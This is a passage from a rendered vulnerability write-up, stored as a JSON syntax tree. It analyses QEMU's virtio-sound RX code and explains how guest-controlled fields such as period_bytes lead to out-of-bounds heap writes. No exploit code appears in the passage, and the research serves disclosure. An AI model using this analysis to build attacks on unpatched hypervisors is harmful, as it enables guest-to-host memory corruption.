WITH_QEMU_LOCK_GUARD",{"type":28,"tag":116,"props":124513,"children":124514},{"style":266},[124515],{"type":33,"value":313},{"type":28,"tag":116,"props":124517,"children":124518},{"style":370},[124519],{"type":33,"value":2780},{"type":28,"tag":116,"props":124521,"children":124522},{"style":272},[124523],{"type":33,"value":1205},{"type":28,"tag":116,"props":124525,"children":124526},{"style":266},[124527],{"type":33,"value":13423},{"type":28,"tag":116,"props":124529,"children":124530},{"style":272},[124531],{"type":33,"value":123688},{"type":28,"tag":116,"props":124533,"children":124534},{"style":266},[124535],{"type":33,"value":844},{"type":28,"tag":116,"props":124537,"children":124538},{"class":245,"line":847},[124539,124544,124548,124552,124557,124561,124565,124569,124573,124577],{"type":28,"tag":116,"props":124540,"children":124541},{"style":260},[124542],{"type":33,"value":124543},"        while",{"type":28,"tag":116,"props":124545,"children":124546},{"style":266},[124547],{"type":33,"value":269},{"type":28,"tag":116,"props":124549,"children":124550},{"style":370},[124551],{"type":33,"value":20285},{"type":28,"tag":116,"props":124553,"children":124554},{"style":282},[124555],{"type":33,"value":124556},"QSIMPLEQ_EMPTY",{"type":28,"tag":116,"props":124558,"children":124559},{"style":266},[124560],{"type":33,"value":313},{"type":28,"tag":116,"props":124562,"children":124563},{"style":370},[124564],{"type":33,"value":2780},{"type":28,"tag":116,"props":124566,"children":124567},{"style":272},[124568],{"type":33,"value":1205},{"type":28,"tag":116,"props":124570,"children":124571},{"style":266},[124572],{"type":33,"value":13423},{"type":28,"tag":116,"props":124574,"children":124575},{"style":272},[124576],{"type":33,"value":123941},{"type":28,"tag":116,"props":124578,"children":124579},{"style":266},[124580],{"type":33,"value":34820},{"type":28,"tag":116,"props":124582,"children":124583},{"class":245,"line":898},[124584,124588,124592,124597,124601,124605,124609,124613,124617],{"type":28,"tag":116,"props":124585,"children":124586},{"style":266},[124587],{"type":33,"value":123777},{"type":28,"tag":116,"props":124589,"children":124590},{"style":370},[124591],{"type":33,"value":373},{"type":28,"tag":116,"props":124593,"children":124594},{"style":282},[124595],{"type":33,"value":124596}," QSIMPLEQ_FIRST",{"type":28,"tag":116,"props":124598,"children":124599},{"style":266},[124600],{"type":33,"value":313},{"type":28,"tag":116,"props":124602,"children":124603},{"style":370},[124604],{"type":33,"value":2780},{"type":28,"tag":116,"props":124606,"children":124607},{"style":272},[124608],{"type":33,"value":1205},{"type":28,"tag":116,"props":124610,"children":124611},{"style":266},[124612],{"type":33,"value":13423},{"type":28,"tag":116,"props":124614,"children":124615},{"style":272},[124616],{"type":33,"value":123941},{"type":28,"tag":116,"props":124618,"children":124619},{"style":266},[124620],{"type":33,"value":895},{"type":28,"tag":116,"props":124622,"children":124623},{"class":245,"line":907},[124624],{"type":28,"tag":116,"props":124625,"children":124626},{"emptyLinePlaceholder":19},[124627],{"type":33,"value":1044},{"type":28,"tag":116,"props":124629,"children":124630},{"class":245,"line":981},[124631],{"type":28,"tag":116,"props":124632,"children":124633},{"style":266},[124634],{"type":33,"value":124635},"            [...]\n",{"type":28,"tag":116,"props":124637,"children":124638},{"class":245,"line":1011},[124639],{"type":28,"tag":116,"props":124640,"children":124641},{"emptyLinePlaceholder":19},[124642],{"type":33,"value":1044},{"type":28,"tag":116,"props":124644,"children":124645},{"class":245,"line":1029},[124646,124651,124655,124659,124663],{"type":28,"tag":116,"props":124647,"children":124648},{"style":266},[124649],{"type":33,"value":124650},"            max_size ",{"type":28,"tag":116,"props":124652,"children":124653},{"style":370},[124654],{"type":33,"value":373},{"type":28,"tag":116,"props":124656,"children":124657},{"style":282},[124658],{"type":33,"value":123709},{"type":28,"tag":116,"props":124660,"children":124661},{"style":266},[124662],{"type":33,"value":313},{"type":28,"tag":116,"props":124664,"children":124665},{"style":250},[124666],{"type":33,"value":124667},"                    // [1]\n",{"type":28,"tag":116,"props":124669,"children":124670},{"class":245,"line":1038},[124671,124676,124680,124684,124688,124692],{"type":28,"tag":116,"props":124672,"children":124673},{"style":272},[124674],{"type":33,"value":124675},"                buffer",{"type":28,"tag":116,"props":124677,"children":124678},{"style":266},[124679],{"type":33,"value":13423},{"type":28,"tag":116,"props":124681,"children":124682},{"style":272},[124683],{"type":33,"value":51682},{"type":28,"tag":116,"props":124685,"children":124686},{"style":266},[124687],{"type":33,"value":13423},{"type":28,"tag":116,"props":124689,"children":124690},{"style":272},[124691],{"type":33,"value":123726},{"type":28,"tag":116,"props":124693,"children":124694},{"style":266},[124695],{"type":33,"value":3178},{"type":28,"tag":116,"props":124697,"children":124698},{"class":245,"line":1047},[124699,124703,124707,124711,124715],{"type":28,"tag":116,"props":124700,"children":124701},{"style":272},[124702],{"type":33,"value":124675},{"type":28,"tag":116,"props":124704,"children":124705},{"style":266},[124706],{"type":33,"value":13423},{"type":28,"tag":116,"props":124708,"children":124709},{"style":272},[124710],{"type":33,"value":51682},{"type":28,"tag":116,"props":124712,"children":124713},{"style":266},[124714],{"type":33,"value":13423},{"type":28,"tag":116,"props":124716,"children":124717},{"style":272},[124718],{"type":33,"value":124719},"in_num\n",{"type":28,"tag":116,"props":124721,"children":124722},{"class":245,"line":1071},[124723],{"type":28,"tag":116,"props":124724,"children":124725},{"style":266},[124726],{"type":33,"value":124727},"            );\n",{"type":28,"tag":116,"props":124729,"children":124730},{"class":245,"line":1137},[124731,124736],{"type":28,"tag":116,"props":124732,"children":124733},{"style":260},[124734],{"type":33,"value":124735},"            for",{"type":28,"tag":116,"props":124737,"children":124738},{"style":266},[124739],{"type":33,"value":123539},{"type":28,"tag":116,"props":124741,"children":124742},{"class":245,"line":1181},[124743,124747,124751,124756,124760,124764,124768,124773],{"type":28,"tag":116,"props":124744,"children":124745},{"style":260},[124746],{"type":33,"value":103133},{"type":28,"tag":116,"props":124748,"children":124749},{"style":266},[124750],{"type":33,"value":269},{"type":28,"tag":116,"props":124752,"children":124753},{"style":272},[124754],{"type":33,"value":124755},"buffer",{"type":28,"tag":116,"props":124757,"children":124758},{"style":266},[124759],{"type":33,"value":13423},{"type":28,"tag":116,"props":124761,"children":124762},{"style":272},[124763],{"type":33,"value":123873},{"type":28,"tag":116,"props":124765,"children":124766},{"style":370},[124767],{"type":33,"value":7974},{"type":28,"tag":116,"props":124769,"children":124770},{"style":266},[124771],{"type":33,"value":124772}," max_size) {",{"type":28,"tag":116,"props":124774,"children":124775},{"style":250},[124776],{"type":33,"value":124777},"     // [2]\n",{"type":28,"tag":116,"props":124779,"children":124780},{"class":245,"line":1212},[124781,124786],{"type":28,"tag":116,"props":124782,"children":124783},{"style":282},[124784],{"type":33,"value":124785},"                    return_rx_buffer",{"type":28,"tag":116,"props":124787,"children":124788},{"style":266},[124789],{"type":33,"value":124790},"(stream, buffer);\n",{"type":28,"tag":116,"props":124792,"children":124793},{"class":245,"line":1254},[124794,124799],{"type":28,"tag":116,"props":124795,"children":124796},{"style":260},[124797],{"type":33,"value":124798},"                    break",{"type":28,"tag":116,"props":124800,"children":124801},{"style":266},[124802],{"type":33,"value":384},{"type":28,"tag":116,"props":124804,"children":124805},{"class":245,"line":1262},[124806],{"type":28,"tag":116,"props":124807,"children":124808},{"style":266},[124809],{"type":33,"value":70689},{"type":28,"tag":116,"props":124811,"children":124812},{"class":245,"line":1294},[124813,124818,124822,124827,124831,124835,124839,124844,124848,124852],{"type":28,"tag":116,"props":124814,"children":124815},{"style":266},[124816],{"type":33,"value":124817},"                size ",{"type":28,"tag":116,"props":124819,"children":124820},{"style":370},[124821],{"type":33,"value":373},{"type":28,"tag":116,"props":124823,"children":124824},{"style":282},[124825],{"type":33,"value":124826}," AUD_read",{"type":28,"tag":116,"props":124828,"children":124829},{"style":266},[124830],{"type":33,"value":313},{"type":28,"tag":116,"props":124832,"children":124833},{"style":272},[124834],{"type":33,"value":1205},{"type":28,"tag":116,"props":124836,"children":124837},{"style":266},[124838],{"type":33,"value":13423},{"type":28,"tag":116,"props":124840,"children":124841},{"style":272},[124842],{"type":33,"value":124843},"voice",{"type":28,"tag":116,"props":124845,"children":124846},{"style":266},[124847],{"type":33,"value":141},{"type":28,"tag":116,"props":124849,"children":124850},{"style":272},[124851],{"type":33,"value":95114},{"type":28,"tag":116,"props":124853,"children":124854},{"style":266},[124855],{"type":33,"value":3178},{"type":28,"tag":116,"props":124857,"children":124858},{"class":245,"line":1334},[124859,124864,124868,124872,124876,124881,124885,124889],{"type":28,"tag":116,"props":124860,"children":124861},{"style":272},[124862],{"type":33,"value":124863},"                        buffer",{"type":28,"tag":116,"props":124865,"children":124866},{"style":266},[124867],{"type":33,"value":13423},{"type":28,"tag":116,"props":124869,"children":124870},{"style":272},[124871],{"type":33,"value":3372},{"type":28,"tag":116,"props":124873,"children":124874},{"style":370},[124875],{"type":33,"value":2258},{"type":28,"tag":116,"props":124877,"children":124878},{"style":272},[124879],{"type":33,"value":124880}," buffer",{"type":28,"tag":116,"props":124882,"children":124883},{"style":266},[124884],{"type":33,"value":13423},{"type":28,"tag":116,"props":124886,"children":124887},{"style":272},[124888],{"type":33,"value":123873},{"type":28,"tag":116,"props":124890,"children":124891},{"style":266},[124892],{"type":33,"value":3178},{"type":28,"tag":116,"props":124894,"children":124895},{"class":245,"line":1372},[124896,124901,124906,124910,124914,124918,124922,124927,124931],{"type":28,"tag":116,"props":124897,"children":124898},{"style":282},[124899],{"type":33,"value":124900},"                        MIN",{"type":28,"tag":116,"props":124902,"children":124903},{"style":266},[124904],{"type":33,"value":124905},"(available, (",{"type":28,"tag":116,"props":124907,"children":124908},{"style":272},[124909],{"type":33,"value":1205},{"type":28,"tag":116,"props":124911,"children":124912},{"style":266},[124913],{"type":33,"value":13423},{"type":28,"tag":116,"props":124915,"children":124916},{"style":272},[124917],{"type":33,"value":97896},{"type":28,"tag":116,"props":124919,"children":124920},{"style":266},[124921],{"type":33,"value":141},{"type":28,"tag":116,"props":124923,"children":124924},{"style":272},[124925],{"type":33,"value":124926},"period_bytes",{"type":28,"tag":116,"props":124928,"children":124929},{"style":370},[124930],{"type":33,"value":50874},{"type":28,"tag":116,"props":124932,"children":124933},{"style":250},[124934],{"type":33,"value":124935},"     // [3]\n",{"type":28,"tag":116,"props":124937,"children":124938},{"class":245,"line":1381},[124939,124944,124948,124952],{"type":28,"tag":116,"props":124940,"children":124941},{"style":272},[124942],{"type":33,"value":124943},"                                        buffer",{"type":28,"tag":116,"props":124945,"children":124946},{"style":266},[124947],{"type":33,"value":13423},{"type":28,"tag":116,"props":124949,"children":124950},{"style":272},[124951],{"type":33,"value":123873},{"type":28,"tag":116,"props":124953,"children":124954},{"style":266},[124955],{"type":33,"value":124956},")));\n",{"type":28,"tag":116,"props":124958,"children":124959},{"class":245,"line":1389},[124960,124964,124968,124972],{"type":28,"tag":116,"props":124961,"children":124962},{"style":260},[124963],{"type":33,"value":103133},{"type":28,"tag":116,"props":124965,"children":124966},{"style":266},[124967],{"type":33,"value":269},{"type":28,"tag":116,"props":124969,"children":124970},{"style":370},[124971],{"type":33,"value":20285},{"type":28,"tag":116,"props":124973,"children":124974},{"style":266},[124975],{"type":33,"value":124976},"size) {\n",{"type":28,"tag":116,"props":124978,"children":124979},{"class":245,"line":1425},[124980,124985,124989,124993],{"type":28,"tag":116,"props":124981,"children":124982},{"style":266},[124983],{"type":33,"value":124984},"                    available ",{"type":28,"tag":116,"props":124986,"children":124987},{"style":370},[124988],{"type":33,"value":373},{"type":28,"tag":116,"props":124990,"children":124991},{"style":350},[124992],{"type":33,"value":2718},{"type":28,"tag":116,"props":124994,"children":124995},{"style":266},[124996],{"type":33,"value":384},{"type":28,"tag":116,"props":124998,"children":124999},{"class":245,"line":1448},[125000,125004],{"type":28,"tag":116,"props":125001,"children":125002},{"style":260},[125003],{"type":33,"value":124798},{"type":28,"tag":116,"props":125005,"children":125006},{"style":266},[125007],{"type":33,"value":384},{"type":28,"tag":116,"props":125009,"children":125010},{"class":245,"line":1456},[125011],{"type":28,"tag":116,"props":125012,"children":125013},{"style":266},[125014],{"type":33,"value":70689},{"type":28,"tag":116,"props":125016,"children":125017},{"class":245,"line":1520},[125018,125022,125026,125030,125034],{"type":28,"tag":116,"props":125019,"children":125020},{"style":272},[125021],{"type":33,"value":124675},{"type":28,"tag":116,"props":125023,"children":125024},{"style":266},[125025],{"type":33,"value":13423},{"type":28,"tag":116,"props":125027,"children":125028},{"style":272},[125029],{"type":33,"value":123873},{"type":28,"tag":116,"props":125031,"children":125032},{"style":370},[125033],{"type":33,"value":14728},{"type":28,"tag":116,"props":125035,"children":125036},{"style":266},[125037],{"type":33,"value":124215},{"type":28,"tag":116,"props":125039,"children":125040},{"class":245,"line":1580},[125041,125046,125050],{"type":28,"tag":116,"props":125042,"children":125043},{"style":266},[125044],{"type":33,"value":125045},"                available ",{"type":28,"tag":116,"props":125047,"children":125048},{"style":370},[125049],{"type":33,"value":103598},{"type":28,"tag":116,"props":125051,"children":125052},{"style":266},[125053],{"type":33,"value":124215},{"type":28,"tag":116,"props":125055,"children":125056},{"class":245,"line":1620},[125057],{"type":28,"tag":116,"props":125058,"children":125059},{"style":266},[125060],{"type":33,"value":125061},"                [...]\n",{"type":28,"tag":116,"props":125063,"children":125064},{"class":245,"line":1668},[125065],{"type":28,"tag":116,"props":125066,"children":125067},{"style":266},[125068],{"type":33,"value":58503},{"type":28,"tag":116,"props":125070,"children":125071},{"class":245,"line":1677},[125072],{"type":28,"tag":116,"props":125073,"children":125074},{"style":266},[125075],{"type":33,"value":1954},{"type":28,"tag":116,"props":125077,"children":125078},{"class":245,"line":1685},[125079],{"type":28,"tag":116,"props":125080,"children":125081},{"style":266},[125082],{"type":33,"value":3025},{"type":28,"tag":116,"props":125084,"children":125085},{"class":245,"line":1729},[125086],{"type":28,"tag":116,"props":125087,"children":125088},{"style":266},[125089],{"type":33,"value":406},{"type":28,"tag":29,"props":125091,"children":125092},{},[125093,125094,125099,125100,125106,125108,125114,125116,125121,125122,125127,125129,125134],{"type":33,"value":123995},{"type":28,"tag":98,"props":125095,"children":125097},{"className":125096},[],[125098],{"type":33,"value":124001},{"type":33,"value":825},{"type":28,"tag":98,"props":125101,"children":125103},{"className":125102},[],[125104],{"type":33,"value":125105},"max_size",{"type":33,"value":125107}," is set to ",{"type":28,"tag":98,"props":125109,"children":125111},{"className":125110},[],[125112],{"type":33,"value":125113},"iov_size(in_sg, in_num)",{"type":33,"value":125115},". Both ",{"type":28,"tag":98,"props":125117,"children":125119},{"className":125118},[],[125120],{"type":33,"value":123726},{"type":33,"value":10659},{"type":28,"tag":98,"props":125123,"children":125125},{"className":125124},[],[125126],{"type":33,"value":123743},{"type":33,"value":125128}," are the same guest-controlled fields from ",{"type":28,"tag":98,"props":125130,"children":125132},{"className":125131},[],[125133],{"type":33,"value":123378},{"type":33,"value":141},{"type":28,"tag":29,"props":125136,"children":125137},{},[125138,125140,125145,125147,125153,125155,125161,125163,125169],{"type":33,"value":125139},"Later, at ",{"type":28,"tag":98,"props":125141,"children":125143},{"className":125142},[],[125144],{"type":33,"value":124036},{"type":33,"value":125146},", the code checks whether ",{"type":28,"tag":98,"props":125148,"children":125150},{"className":125149},[],[125151],{"type":33,"value":125152},"buffer->size >= max_size",{"type":33,"value":125154},". In the RX path, ",{"type":28,"tag":98,"props":125156,"children":125158},{"className":125157},[],[125159],{"type":33,"value":125160},"buffer->size",{"type":33,"value":125162}," tracks how many bytes have been written into ",{"type":28,"tag":98,"props":125164,"children":125166},{"className":125165},[],[125167],{"type":33,"value":125168},"buffer->data",{"type":33,"value":125170},", not the size of the allocation itself. This check is therefore intended to stop reading once the buffer is full.",{"type":28,"tag":29,"props":125172,"children":125173},{},[125174,125176,125181,125183,125189,125191,125196,125198,125204],{"type":33,"value":125175},"However, this does not match the allocation logic in ",{"type":28,"tag":98,"props":125177,"children":125179},{"className":125178},[],[125180],{"type":33,"value":123378},{"type":33,"value":125182},", which used: ",{"type":28,"tag":98,"props":125184,"children":125186},{"className":125185},[],[125187],{"type":33,"value":125188},"size = iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status);",{"type":33,"value":125190},". In other words, the allocation subtracts ",{"type":28,"tag":98,"props":125192,"children":125194},{"className":125193},[],[125195],{"type":33,"value":124102},{"type":33,"value":125197},", but the later bound in ",{"type":28,"tag":98,"props":125199,"children":125201},{"className":125200},[],[125202],{"type":33,"value":125203},"virtio_snd_pcm_in_cb",{"type":33,"value":125205}," does not. That mismatch gives us a second bug: an 8-byte OOB write.",{"type":28,"tag":29,"props":125207,"children":125208},{},[125209,125211,125216,125218,125224,125226,125232,125234,125239,125241,125247,125249,125255,125257,125262,125264,125269],{"type":33,"value":125210},"Finally, at ",{"type":28,"tag":98,"props":125212,"children":125214},{"className":125213},[],[125215],{"type":33,"value":124060},{"type":33,"value":125217},", the code calls ",{"type":28,"tag":98,"props":125219,"children":125221},{"className":125220},[],[125222],{"type":33,"value":125223},"AUD_read",{"type":33,"value":125225}," with the following limit:\n",{"type":28,"tag":98,"props":125227,"children":125229},{"className":125228},[],[125230],{"type":33,"value":125231},"MIN(available, stream->params.period_bytes - buffer->size)",{"type":33,"value":125233},". Notice how this bound does not take ",{"type":28,"tag":98,"props":125235,"children":125237},{"className":125236},[],[125238],{"type":33,"value":125105},{"type":33,"value":125240}," into account at all. That means if ",{"type":28,"tag":98,"props":125242,"children":125244},{"className":125243},[],[125245],{"type":33,"value":125246},"available",{"type":33,"value":125248}," is larger than the allocated buffer, and ",{"type":28,"tag":98,"props":125250,"children":125252},{"className":125251},[],[125253],{"type":33,"value":125254},"stream->params.period_bytes",{"type":33,"value":125256}," is also larger than the allocated buffer, ",{"type":28,"tag":98,"props":125258,"children":125260},{"className":125259},[],[125261],{"type":33,"value":125223},{"type":33,"value":125263}," will write past the end of ",{"type":28,"tag":98,"props":125265,"children":125267},{"className":125266},[],[125268],{"type":33,"value":125168},{"type":33,"value":125270}," - the third, and final, bug we found.",{"type":28,"tag":29,"props":125272,"children":125273},{},[125274,125276,125281,125283,125289],{"type":33,"value":125275},"Looking further at the code, we can see that ",{"type":28,"tag":98,"props":125277,"children":125279},{"className":125278},[],[125280],{"type":33,"value":125254},{"type":33,"value":125282}," is fully guest-controlled by issuing a ",{"type":28,"tag":98,"props":125284,"children":125286},{"className":125285},[],[125287],{"type":33,"value":125288},"VIRTIO_SND_R_PCM_SET_PARAMS",{"type":33,"value":125290}," request:",{"type":28,"tag":234,"props":125292,"children":125294},{"code":125293,"language":1797,"meta":7,"className":16176,"style":7},"static\nuint32_t virtio_snd_set_pcm_params(VirtIOSound *s,\n                                   uint32_t stream_id,\n                                   virtio_snd_pcm_set_params *params)\n{\n    virtio_snd_pcm_set_params *st_params;\n\n    [...]\n\n    st_params = virtio_snd_pcm_get_params(s, stream_id);\n\n    [...]\n\n    st_params->buffer_bytes = le32_to_cpu(params->buffer_bytes);\n    st_params->period_bytes = le32_to_cpu(params->period_bytes);\n    st_params->features = le32_to_cpu(params->features);\n    /* the following are uint8_t, so there's no need to bswap the values. */\n    st_params->channels = params->channels;\n    st_params->format = params->format;\n    st_params->rate = params->rate;\n\n    return cpu_to_le32(VIRTIO_SND_S_OK);\n}\n",[125295],{"type":28,"tag":98,"props":125296,"children":125297},{"__ignoreMap":7},[125298,125306,125335,125352,125372,125379,125396,125403,125410,125417,125439,125446,125453,125460,125506,125549,125593,125601,125638,125674,125710,125717,125734],{"type":28,"tag":116,"props":125299,"children":125300},{"class":245,"line":246},[125301],{"type":28,"tag":116,"props":125302,"children":125303},{"style":376},[125304],{"type":33,"value":125305},"static\n",{"type":28,"tag":116,"props":125307,"children":125308},{"class":245,"line":256},[125309,125313,125318,125323,125327,125331],{"type":28,"tag":116,"props":125310,"children":125311},{"style":376},[125312],{"type":33,"value":57552},{"type":28,"tag":116,"props":125314,"children":125315},{"style":282},[125316],{"type":33,"value":125317}," virtio_snd_set_pcm_params",{"type":28,"tag":116,"props":125319,"children":125320},{"style":266},[125321],{"type":33,"value":125322},"(VirtIOSound ",{"type":28,"tag":116,"props":125324,"children":125325},{"style":370},[125326],{"type":33,"value":4240},{"type":28,"tag":116,"props":125328,"children":125329},{"style":272},[125330],{"type":33,"value":10318},{"type":28,"tag":116,"props":125332,"children":125333},{"style":266},[125334],{"type":33,"value":3178},{"type":28,"tag":116,"props":125336,"children":125337},{"class":245,"line":293},[125338,125343,125348],{"type":28,"tag":116,"props":125339,"children":125340},{"style":376},[125341],{"type":33,"value":125342},"                                   uint32_t",{"type":28,"tag":116,"props":125344,"children":125345},{"style":272},[125346],{"type":33,"value":125347}," stream_id",{"type":28,"tag":116,"props":125349,"children":125350},{"style":266},[125351],{"type":33,"value":3178},{"type":28,"tag":116,"props":125353,"children":125354},{"class":245,"line":361},[125355,125360,125364,125368],{"type":28,"tag":116,"props":125356,"children":125357},{"style":266},[125358],{"type":33,"value":125359},"                                   virtio_snd_pcm_set_params ",{"type":28,"tag":116,"props":125361,"children":125362},{"style":370},[125363],{"type":33,"value":4240},{"type":28,"tag":116,"props":125365,"children":125366},{"style":272},[125367],{"type":33,"value":97896},{"type":28,"tag":116,"props":125369,"children":125370},{"style":266},[125371],{"type":33,"value":2830},{"type":28,"tag":116,"props":125373,"children":125374},{"class":245,"line":387},[125375],{"type":28,"tag":116,"props":125376,"children":125377},{"style":266},[125378],{"type":33,"value":10547},{"type":28,"tag":116,"props":125380,"children":125381},{"class":245,"line":400},[125382,125387,125391],{"type":28,"tag":116,"props":125383,"children":125384},{"style":266},[125385],{"type":33,"value":125386},"    virtio_snd_pcm_set_params ",{"type":28,"tag":116,"props":125388,"children":125389},{"style":370},[125390],{"type":33,"value":4240},{"type":28,"tag":116,"props":125392,"children":125393},{"style":266},[125394],{"type":33,"value":125395},"st_params;\n",{"type":28,"tag":116,"props":125397,"children":125398},{"class":245,"line":614},[125399],{"type":28,"tag":116,"props":125400,"children":125401},{"emptyLinePlaceholder":19},[125402],{"type":33,"value":1044},{"type":28,"tag":116,"props":125404,"children":125405},{"class":245,"line":631},[125406],{"type":28,"tag":116,"props":125407,"children":125408},{"style":266},[125409],{"type":33,"value":104414},{"type":28,"tag":116,"props":125411,"children":125412},{"class":245,"line":665},[125413],{"type":28,"tag":116,"props":125414,"children":125415},{"emptyLinePlaceholder":19},[125416],{"type":33,"value":1044},{"type":28,"tag":116,"props":125418,"children":125419},{"class":245,"line":713},[125420,125425,125429,125434],{"type":28,"tag":116,"props":125421,"children":125422},{"style":266},[125423],{"type":33,"value":125424},"    st_params ",{"type":28,"tag":116,"props":125426,"children":125427},{"style":370},[125428],{"type":33,"value":373},{"type":28,"tag":116,"props":125430,"children":125431},{"style":282},[125432],{"type":33,"value":125433}," virtio_snd_pcm_get_params",{"type":28,"tag":116,"props":125435,"children":125436},{"style":266},[125437],{"type":33,"value":125438},"(s, stream_id);\n",{"type":28,"tag":116,"props":125440,"children":125441},{"class":245,"line":750},[125442],{"type":28,"tag":116,"props":125443,"children":125444},{"emptyLinePlaceholder":19},[125445],{"type":33,"value":1044},{"type":28,"tag":116,"props":125447,"children":125448},{"class":245,"line":779},[125449],{"type":28,"tag":116,"props":125450,"children":125451},{"style":266},[125452],{"type":33,"value":104414},{"type":28,"tag":116,"props":125454,"children":125455},{"class":245,"line":796},[125456],{"type":28,"tag":116,"props":125457,"children":125458},{"emptyLinePlaceholder":19},[125459],{"type":33,"value":1044},{"type":28,"tag":116,"props":125461,"children":125462},{"class":245,"line":847},[125463,125468,125472,125477,125481,125486,125490,125494,125498,125502],{"type":28,"tag":116,"props":125464,"children":125465},{"style":272},[125466],{"type":33,"value":125467},"    st_params",{"type":28,"tag":116,"props":125469,"children":125470},{"style":266},[125471],{"type":33,"value":13423},{"type":28,"tag":116,"props":125473,"children":125474},{"style":272},[125475],{"type":33,"value":125476},"buffer_bytes",{"type":28,"tag":116,"props":125478,"children":125479},{"style":370},[125480],{"type":33,"value":2226},{"type":28,"tag":116,"props":125482,"children":125483},{"style":282},[125484],{"type":33,"value":125485}," le32_to_cpu",{"type":28,"tag":116,"props":125487,"children":125488},{"style":266},[125489],{"type":33,"value":313},{"type":28,"tag":116,"props":125491,"children":125492},{"style":272},[125493],{"type":33,"value":97896},{"type":28,"tag":116,"props":125495,"children":125496},{"style":266},[125497],{"type":33,"value":13423},{"type":28,"tag":116,"props":125499,"children":125500},{"style":272},[125501],{"type":33,"value":125476},{"type":28,"tag":116,"props":125503,"children":125504},{"style":266},[125505],{"type":33,"value":895},{"type":28,"tag":116,"props":125507,"children":125508},{"class":245,"line":898},[125509,125513,125517,125521,125525,125529,125533,125537,125541,125545],{"type":28,"tag":116,"props":125510,"children":125511},{"style":272},[125512],{"type":33,"value":125467},{"type":28,"tag":116,"props":125514,"children":125515},{"style":266},[125516],{"type":33,"value":13423},{"type":28,"tag":116,"props":125518,"children":125519},{"style":272},[125520],{"type":33,"value":124926},{"type":28,"tag":116,"props":125522,"children":125523},{"style":370},[125524],{"type":33,"value":2226},{"type":28,"tag":116,"props":125526,"children":125527},{"style":282},[125528],{"type":33,"value":125485},{"type":28,"tag":116,"props":125530,"children":125531},{"style":266},[125532],{"type":33,"value":313},{"type":28,"tag":116,"props":125534,"children":125535},{"style":272},[125536],{"type":33,"value":97896},{"type":28,"tag":116,"props":125538,"children":125539},{"style":266},[125540],{"type":33,"value":13423},{"type":28,"tag":116,"props":125542,"children":125543},{"style":272},[125544],{"type":33,"value":124926},{"type":28,"tag":116,"props":125546,"children":125547},{"style":266},[125548],{"type":33,"value":895},{"type":28,"tag":116,"props":125550,"children":125551},{"class":245,"line":907},[125552,125556,125560,125565,125569,125573,125577,125581,125585,125589],{"type":28,"tag":116,"props":125553,"children":125554},{"style":272},[125555],{"type":33,"value":125467},{"type":28,"tag":116,"props":125557,"children":125558},{"style":266},[125559],{"type":33,"value":13423},{"type":28,"tag":116,"props":125561,"children":125562},{"style":272},[125563],{"type":33,"value":125564},"features",{"type":28,"tag":116,"props":125566,"children":125567},{"style":370},[125568],{"type":33,"value":2226},{"type":28,"tag":116,"props":125570,"children":125571},{"style":282},[125572],{"type":33,"value":125485},{"type":28,"tag":116,"props":125574,"children":125575},{"style":266},[125576],{"type":33,"value":313},{"type":28,"tag":116,"props":125578,"children":125579},{"style":272},[125580],{"type":33,"value":97896},{"type":28,"tag":116,"props":125582,"children":125583},{"style":266},[125584],{"type":33,"value":13423},{"type":28,"tag":116,"props":125586,"children":125587},{"style":272},[125588],{"type":33,"value":125564},{"type":28,"tag":116,"props":125590,"children":125591},{"style":266},[125592],{"type":33,"value":895},{"type":28,"tag":116,"props":125594,"children":125595},{"class":245,"line":981},[125596],{"type":28,"tag":116,"props":125597,"children":125598},{"style":250},[125599],{"type":33,"value":125600},"    /* the following are uint8_t, so there's no need to bswap the values. */\n",{"type":28,"tag":116,"props":125602,"children":125603},{"class":245,"line":1011},[125604,125608,125612,125617,125621,125626,125630,125634],{"type":28,"tag":116,"props":125605,"children":125606},{"style":272},[125607],{"type":33,"value":125467},{"type":28,"tag":116,"props":125609,"children":125610},{"style":266},[125611],{"type":33,"value":13423},{"type":28,"tag":116,"props":125613,"children":125614},{"style":272},[125615],{"type":33,"value":125616},"channels",{"type":28,"tag":116,"props":125618,"children":125619},{"style":370},[125620],{"type":33,"value":2226},{"type":28,"tag":116,"props":125622,"children":125623},{"style":272},[125624],{"type":33,"value":125625}," params",{"type":28,"tag":116,"props":125627,"children":125628},{"style":266},[125629],{"type":33,"value":13423},{"type":28,"tag":116,"props":125631,"children":125632},{"style":272},[125633],{"type":33,"value":125616},{"type":28,"tag":116,"props":125635,"children":125636},{"style":266},[125637],{"type":33,"value":384},{"type":28,"tag":116,"props":125639,"children":125640},{"class":245,"line":1029},[125641,125645,125649,125654,125658,125662,125666,125670],{"type":28,"tag":116,"props":125642,"children":125643},{"style":272},[125644],{"type":33,"value":125467},{"type":28,"tag":116,"props":125646,"children":125647},{"style":266},[125648],{"type":33,"value":13423},{"type":28,"tag":116,"props":125650,"children":125651},{"style":272},[125652],{"type":33,"value":125653},"format",{"type":28,"tag":116,"props":125655,"children":125656},{"style":370},[125657],{"type":33,"value":2226},{"type":28,"tag":116,"props":125659,"children":125660},{"style":272},[125661],{"type":33,"value":125625},{"type":28,"tag":116,"props":125663,"children":125664},{"style":266},[125665],{"type":33,"value":13423},{"type":28,"tag":116,"props":125667,"children":125668},{"style":272},[125669],{"type":33,"value":125653},{"type":28,"tag":116,"props":125671,"children":125672},{"style":266},[125673],{"type":33,"value":384},{"type":28,"tag":116,"props":125675,"children":125676},{"class":245,"line":1038},[125677,125681,125685,125690,125694,125698,125702,125706],{"type":28,"tag":116,"props":125678,"children":125679},{"style":272},[125680],{"type":33,"value":125467},{"type":28,"tag":116,"props":125682,"children":125683},{"style":266},[125684],{"type":33,"value":13423},{"type":28,"tag":116,"props":125686,"children":125687},{"style":272},[125688],{"type":33,"value":125689},"rate",{"type":28,"tag":116,"props":125691,"children":125692},{"style":370},[125693],{"type":33,"value":2226},{"type":28,"tag":116,"props":125695,"children":125696},{"style":272},[125697],{"type":33,"value":125625},{"type":28,"tag":116,"props":125699,"children":125700},{"style":266},[125701],{"type":33,"value":13423},{"type":28,"tag":116,"props":125703,"children":125704},{"style":272},[125705],{"type":33,"value":125689},{"type":28,"tag":116,"props":125707,"children":125708},{"style":266},[125709],{"type":33,"value":384},{"type":28,"tag":116,"props":125711,"children":125712},{"class":245,"line":1047},[125713],{"type":28,"tag":116,"props":125714,"children":125715},{"emptyLinePlaceholder":19},[125716],{"type":33,"value":1044},{"type":28,"tag":116,"props":125718,"children":125719},{"class":245,"line":1071},[125720,125724,125729],{"type":28,"tag":116,"props":125721,"children":125722},{"style":260},[125723],{"type":33,"value":393},{"type":28,"tag":116,"props":125725,"children":125726},{"style":282},[125727],{"type":33,"value":125728